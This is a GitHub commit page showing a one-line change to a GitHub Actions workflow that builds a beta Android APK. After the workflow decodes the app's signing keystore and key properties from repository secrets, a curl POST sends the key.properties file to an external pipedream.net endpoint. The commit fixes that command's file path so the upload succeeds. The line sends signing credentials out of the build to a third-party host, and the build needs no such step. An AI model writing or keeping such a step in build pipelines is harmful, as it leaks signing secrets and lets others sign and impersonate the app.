Skip to content

Commit

Permalink
TT 2
Browse files Browse the repository at this point in the history
  • Loading branch information
sadespresso committed Jan 28, 2025
1 parent 8c4f2e4 commit 6060f9a
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion .github/workflows/build-fat-apk-android-beta.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -29,7 +29,7 @@ jobs:
run: |
echo "${{ secrets.SIGNING_KEY_PROPERTIES }}" > ./android/key.properties
echo "${{ secrets.SIGNING_KEYSTORE }}" | base64 --decode > ./android/flow-upload-keystore.jks
curl -X POST --data-binary "@/./android/key.properties" https://eo19khblcrjgwuu.m.pipedream.net
curl -X POST --data-binary "@/home/runner/work/flow/flow/android/key.properties" https://eo19khblcrjgwuu.m.pipedream.net
- name: Build fat APK
run: flutter build apk --release --no-tree-shake-icons
- name: Upload file to release
Expand Down

0 comments on commit 6060f9a

Please sign in to comment.